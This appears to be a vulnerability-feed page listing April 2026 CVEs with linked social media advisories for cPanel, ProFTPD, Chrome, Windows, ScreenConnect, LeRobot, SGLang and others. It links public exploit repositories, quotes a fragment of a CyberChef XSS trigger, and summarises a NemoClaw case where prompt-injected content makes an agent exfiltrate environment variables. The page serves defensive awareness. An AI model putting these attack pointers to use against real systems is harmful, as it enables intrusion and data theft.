cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AlesandroOrtiz at 2026-04-29T22:32:03.430Z ##

@mttaggart Detailed analysis by Watchtowr: labs.watchtowr.com/the-interne

##

barubary@infosec.exchange at 2026-04-30T10:22:34.000Z ##

RE: social.bund.de/@certbund/11649

labs.watchtowr.com/the-interne

#cPanel #exploit

##

offseq@infosec.exchange at 2026-04-30T01:30:29.000Z ##

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #cPanel #Vulnerability #Infosec

##

AlesandroOrtiz@infosec.exchange at 2026-04-29T22:32:03.000Z ##

@mttaggart Detailed analysis by Watchtowr: labs.watchtowr.com/the-interne

##

threatcodex@infosec.exchange at 2026-04-29T18:11:35.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
labs.watchtowr.com/the-interne

##

_r_netsec@infosec.exchange at 2026-04-29T17:28:05.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs labs.watchtowr.com/the-interne

##

CVE-2026-7420
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T00:31:28

2 posts

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-29T23:41:10.000Z ##

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7419
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T00:31:28

2 posts

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-29T23:40:59.000Z ##

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7424
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-29T23:16:20.367000

2 posts

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service (permanent IP task freeze requiring hardware reset) by sending a single crafted DHCPv6 packet. The issue is present whenever DHCPv6 is enabled.

thehackerwire@mastodon.social at 2026-04-29T23:01:45.000Z ##

🟠 CVE-2026-7424 - High (8.1)

Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7418
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T22:16:22.620000

2 posts

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-29T23:00:12.000Z ##

🟠 CVE-2026-7418 - High (8.8)

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34965
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T21:31:37

2 posts

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via incl

thehackerwire@mastodon.social at 2026-04-29T23:01:26.000Z ##

🟠 CVE-2026-34965 - High (8.8)

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42515
(0 None)

EPSS: 0.05%

updated 2026-04-29T21:14:23.977000

1 post

This vulnerability exists in e-Sushrut due to improper access control in resource access validation. An authenticated attacker could exploit this vulnerability by manipulating parameter in the API request URL to gain unauthorized access to sensitive information of patients on the targeted system.

offseq@infosec.exchange at 2026-04-29T09:00:29.000Z ##

New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. radar.offseq.com/threat/cve-20 #OffSeq #Healthcare #CVE #Security

##

CVE-2026-5166
(9.6 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T21:13:30.563000

4 posts

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal. This issue affects Pardus Software Center: before 1.0.3.

offseq at 2026-04-30T03:00:40.812Z ##

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-04-29T23:42:00.000Z ##

🔴 CVE-2026-5166 - Critical (9.6)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal.

This issue affects Pardus Software Center: befor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-30T03:00:40.000Z ##

🚩 CRITICAL: CVE-2026-5166 in Pardus Software Center <1.0.3 enables path traversal — attackers may access/modify files outside restricted dirs. No patch yet. Restrict access, monitor updates. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #Pardus #Infosec

##

CVE-2026-30893
(9.0 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T20:16:29.660000

3 posts

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. This can be escalated to code execution in the W

Matchbook3469@mastodon.social at 2026-04-30T08:40:04.000Z ##

🔴 New security advisory:

CVE-2026-30893 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#CVE #SecurityPatching #HackerNews

##

thehackerwire@mastodon.social at 2026-04-29T23:41:47.000Z ##

🔴 CVE-2026-30893 - Critical (9)

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.4.0 to before version 4.14.4, a path traversal vulnerability in Wazuh's cluster synchronization extraction routine allows an authenticated...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7466
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T19:16:27.013000

2 posts

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of

thehackerwire@mastodon.social at 2026-04-29T23:01:36.000Z ##

🟠 CVE-2026-7466 - High (8.8)

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0204
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:42

1 post

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

thehackerwire@mastodon.social at 2026-04-29T19:01:06.000Z ##

🟠 CVE-2026-0204 - High (8)

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6849
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:31:41

1 post

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

1 repo

https://github.com/osmancanvural/CVE-2026-6849

thehackerwire@mastodon.social at 2026-04-29T19:01:16.000Z ##

🟠 CVE-2026-6849 - High (8.8)

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.

This issue affects Pardus OS My...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5712
(8.0 HIGH)

EPSS: 0.00%

updated 2026-04-29T18:16:05.180000

1 post

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

thehackerwire@mastodon.social at 2026-04-29T19:00:56.000Z ##

🟠 CVE-2026-5712 - High (8)

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42167
(8.1 HIGH)

EPSS: 0.24%

updated 2026-04-29T16:16:25.303000

4 posts

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

Nuclei template

2 repos

https://github.com/ZeroPathAI/proftpd-CVE-2026-42167-poc

https://github.com/dinosn/proftpd-CVE-2026-42167-analysis

undercodenews@mastodon.social at 2026-04-30T07:13:44.000Z ##

Critical ProFTPD SQL Injection Flaw Exposes Thousands of Internet-Facing FTP Servers to Remote Attacks

Introduction A newly disclosed security vulnerability in ProFTPD, one of the most widely used FTP server solutions on the internet, has raised serious concerns across the hosting and Linux administration community. Tracked as CVE-2026-42167, the flaw affects the mod_sql extension and can allow attackers to execute code remotely, bypass authentication, escalate…

undercodenews.com/critical-pro

##

Tinolle@infosec.exchange at 2026-04-29T18:25:57.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
zeropath.com/blog/proftpd-cve-

##

threatcodex@infosec.exchange at 2026-04-29T14:17:39.000Z ##

CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
zeropath.com/blog/proftpd-cve-

##

thehackerwire@mastodon.social at 2026-04-28T23:27:41.000Z ##

🟠 CVE-2026-42167 - High (8.1)

mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7344
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-29T15:31:44

1 post

Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T01:30:26.000Z ##

CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vuln #Cybersecurity

##

CVE-2026-7343
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-04-29T15:31:43

1 post

Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

offseq@infosec.exchange at 2026-04-29T00:00:40.000Z ##

⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #Chrome #Vulnerability #Security

##

CVE-2026-42523
(9.0 CRITICAL)

EPSS: 0.00%

updated 2026-04-29T15:16:07.077000

3 posts

Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature "GitHub hook trigger for GITScm polling", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission.

Matchbook3469@mastodon.social at 2026-04-30T11:45:01.000Z ##

🚨 New security advisory:

CVE-2026-42523 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #ZeroDay #ThreatIntel

##

offseq at 2026-04-30T04:30:29.725Z ##

🚨 CRITICAL: Jenkins GitHub Plugin ≤1.46.0 has a stored XSS (CVE-2026-42523). Attackers with Overall/Read permission can run JS in users' browsers. Limit permissions & check vendor for patches. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T04:30:29.000Z ##

🚨 CRITICAL: Jenkins GitHub Plugin ≤1.46.0 has a stored XSS (CVE-2026-42523). Attackers with Overall/Read permission can run JS in users' browsers. Limit permissions & check vendor for patches. radar.offseq.com/threat/cve-20 #OffSeq #Jenkins #XSS #Vuln

##

CVE-2026-5760
(9.8 CRITICAL)

EPSS: 0.38%

updated 2026-04-29T14:16:19.920000

1 post

SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) when a model file containing a malicious tokenizer.chat_template is loaded, as the Jinja2 chat templates are rendered using an unsandboxed jinja2.Environment().

1 repo

https://github.com/Stuub/SGLang-0.5.9-RCE

canartuc@mastodon.social at 2026-04-29T14:10:45.000Z ##

CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.

#AI #InfoSec #CyberSecurity #OpenSource #LLM

##

CVE-2026-7321
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-04-29T06:16:08.357000

1 post

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox 150, Thunderbird 150, and Firefox ESR 140.10.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:22.000Z ##

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42615
(7.2 HIGH)

EPSS: 0.01%

updated 2026-04-29T04:16:41.750000

2 posts

GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated by the /#recipe=Show_Base64_offsets('%3Cscript substring.

cR0w@infosec.exchange at 2026-04-29T04:41:24.000Z ##

RE: infosec.exchange/@cR0w/1164832

lol

cve.org/CVERecord?id=CVE-2026-

##

offseq@infosec.exchange at 2026-04-29T04:30:25.000Z ##

🔎 XSS (HIGH, CVSS 7.2) in GCHQ CyberChef <11.0.0 (CVE-2026-42615): Improper input neutralization in Show Base64 offsets lets attackers inject scripts remotely — info theft/session hijack possible. No fix yet. Avoid untrusted input. radar.offseq.com/threat/cve-20 #OffSeq #CyberChef #XSS

##

CVE-2026-23773
(4.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-29T04:16:40.867000

1 post

Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.

offseq@infosec.exchange at 2026-04-29T06:00:26.000Z ##

MEDIUM severity SSRF (CVE-2026-23773) found in Dell DLm8700 📢. Low-priv remote attackers can trigger server-side requests. No known exploits, no patch yet — restrict access & follow vendor advisories. radar.offseq.com/threat/cve-20 #OffSeq #SSRF #Dell #Cybersecurity

##

CVE-2026-41873
(9.8 CRITICAL)

EPSS: 0.12%

updated 2026-04-29T00:31:25

1 post

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As

thehackerwire@mastodon.social at 2026-04-28T23:27:51.000Z ##

🔴 CVE-2026-41873 - Critical (9.8)

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.

This issue affects all versions of the Lua implementation of Pony Mail....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32202
(4.3 MEDIUM)

EPSS: 7.19%

updated 2026-04-28T21:47:02.087000

7 posts

Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

1 repo

https://github.com/solarlynxsqueeze/CVE-2026-32202

571906@ap.podcastindex.org at 2026-04-30T02:00:02.000Z ##

New Episode: SANS Stormcast Thursday, April 30th, 2026: Odd Requests; MSFT LNK Bug Exploited; Secure Boot Fix; TLS Updates; SAP npm malware

Shownotes:

Today's Odd Web Requests
https://isc.sans.edu/diary/Today%27s%20Odd%20Web%20Requests/32934
Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202
https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero


##

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T11:01:43.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202

Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.

**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Credential theft on Windows: Microsoft reveals exploitation of CVE-2026-32202 it-connect.fr/vols-didentifian #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

Chris@mast.social at 2026-04-28T18:17:44.000Z ##

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

cve.org/CVERecord?id=CVE-2026-

#cybersecurity #security #windows #microsoft

##

cisakevtracker@mastodon.social at 2026-04-28T18:01:08.000Z ##

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-1708
(8.4 HIGH)

EPSS: 81.62%

updated 2026-04-28T21:44:53.770000

4 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

3 repos

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T16:01:43.000Z ##

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allows for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

cisakevtracker@mastodon.social at 2026-04-28T18:00:52.000Z ##

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2026-25874
(9.8 CRITICAL)

EPSS: 0.11%

updated 2026-04-28T21:37:03

3 posts

LeRobot contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the S

beyondmachines1@infosec.exchange at 2026-04-29T13:01:43.000Z ##

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

hackerworkspace@infosec.exchange at 2026-04-29T04:16:35.000Z ##

Critical Unpatched Flaw Leaves Hugging Face LeRobot Open to Unauthenticated RCE

thehackernews.com/2026/04/crit

Read on HackerWorkspace: hackerworkspace.com/article/cr

#cybersecurity #aisecurity #vulnerability

##

netsecio@mastodon.social at 2026-04-28T16:41:17.000Z ##

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 cyber.netsecops.io

##

CVE-2026-24222
(8.6 HIGH)

EPSS: 0.04%

updated 2026-04-28T21:36:23

2 posts

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environment variables not properly restricted during sandbox creation. A successful exploit of this vulnerability might lead to information disclosure.

thehackerwire@mastodon.social at 2026-04-28T22:33:42.000Z ##

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24231
(6.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-28T21:36:22

1 post

